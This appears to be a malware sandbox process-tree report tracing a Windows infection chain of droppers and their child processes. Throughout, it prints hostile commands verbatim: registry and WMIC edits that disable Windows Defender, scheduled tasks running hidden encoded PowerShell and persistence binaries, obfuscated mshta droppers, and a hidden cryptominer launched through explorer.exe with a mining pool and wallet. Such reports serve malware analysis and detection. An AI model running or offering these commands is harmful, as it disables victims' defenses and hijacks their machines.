C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYqjstSoS" /SC once /ST 07:07:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 09:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\tdVRLcH.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\ZnOJUZYeiLcgg2qi3EKdqjT5.exe"C:\Users\Admin\Documents\ZnOJUZYeiLcgg2qi3EKdqjT5.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\ZwD24QUjPt3CXwW27xWlqIZe.exe"C:\Users\Admin\Documents\ZwD24QUjPt3CXwW27xWlqIZe.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\DeinJXLjgvheHvdMBWkzIf9S.exe"C:\Users\Admin\Documents\DeinJXLjgvheHvdMBWkzIf9S.exe"6⤵
-
C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe"C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe"C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\6h7TGlpVEfKxMzs0E3XQolaC.exe"C:\Users\Admin\Documents\6h7TGlpVEfKxMzs0E3XQolaC.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\ICL5tqbRIE9gecc0WfBQzYV0.exe"C:\Users\Admin\Documents\ICL5tqbRIE9gecc0WfBQzYV0.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\CJeRWlxNdVxvx5eZGzAWYfVu.exe"C:\Users\Admin\Documents\CJeRWlxNdVxvx5eZGzAWYfVu.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1482356.scr"C:\Users\Admin\AppData\Roaming\1482356.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\3689896.scr"C:\Users\Admin\AppData\Roaming\3689896.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\3027623.scr"C:\Users\Admin\AppData\Roaming\3027623.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1361734.scr"C:\Users\Admin\AppData\Roaming\1361734.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3481701.scr"C:\Users\Admin\AppData\Roaming\3481701.scr" /S7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10b0a06a73706.exeFri10b0a06a73706.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1223505.scr"C:\Users\Admin\AppData\Roaming\1223505.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8752590.scr"C:\Users\Admin\AppData\Roaming\8752590.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1258873.scr"C:\Users\Admin\AppData\Roaming\1258873.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4051319.scr"C:\Users\Admin\AppData\Roaming\4051319.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7375211.scr"C:\Users\Admin\AppData\Roaming\7375211.scr" /S6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\7375211.scr"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\3144856.scr"C:\Users\Admin\AppData\Roaming\3144856.scr" /S6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1015b9a4e0b.exeFri1015b9a4e0b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 2926⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1008c7d6874.exeFri1008c7d6874.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri103a7805577.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri103a7805577.exeFri103a7805577.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5865939.scr"C:\Users\Admin\AppData\Roaming\5865939.scr" /S8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1696741.scr"C:\Users\Admin\AppData\Roaming\1696741.scr" /S8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4726559.scr"C:\Users\Admin\AppData\Roaming\4726559.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7424173.scr"C:\Users\Admin\AppData\Roaming\7424173.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6037216.scr"C:\Users\Admin\AppData\Roaming\6037216.scr" /S8⤵
-
C:\Users\Admin\AppData\Local\Temp\inst001.exe"C:\Users\Admin\AppData\Local\Temp\inst001.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 2368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 3488⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 5968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 6008⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 6408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 6408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 7808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run ("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0 , trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-2E4FB.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-2E4FB.tmp\setup_2.tmp" /SL5="$202C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-AAQA9.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-AAQA9.tmp\setup_2.tmp" /SL5="$20292,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-CILS0.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-CILS0.tmp\postback.exe" ss111⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri105268dda3.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri105268dda3.exeFri105268dda3.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2446⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10fcc13ae0125c8.exeFri10fcc13ae0125c8.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-93ORI.tmp\Fri10fcc13ae0125c8.tmp"C:\Users\Admin\AppData\Local\Temp\is-93ORI.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$201EC,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10fcc13ae0125c8.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-QDBG5.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-QDBG5.tmp\Sayma.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Reference Assemblies\SLLGYPWQFN\ultramediaburner.exe"C:\Program Files\Reference Assemblies\SLLGYPWQFN\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2OAFF.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-2OAFF.tmp\ultramediaburner.tmp" /SL5="$402D8,281924,62464,C:\Program Files\Reference Assemblies\SLLGYPWQFN\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\33-b881b-f8f-a9e91-8b05b7a454807\Redysasory.exe"C:\Users\Admin\AppData\Local\Temp\33-b881b-f8f-a9e91-8b05b7a454807\Redysasory.exe"8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 /prefetch:810⤵
-
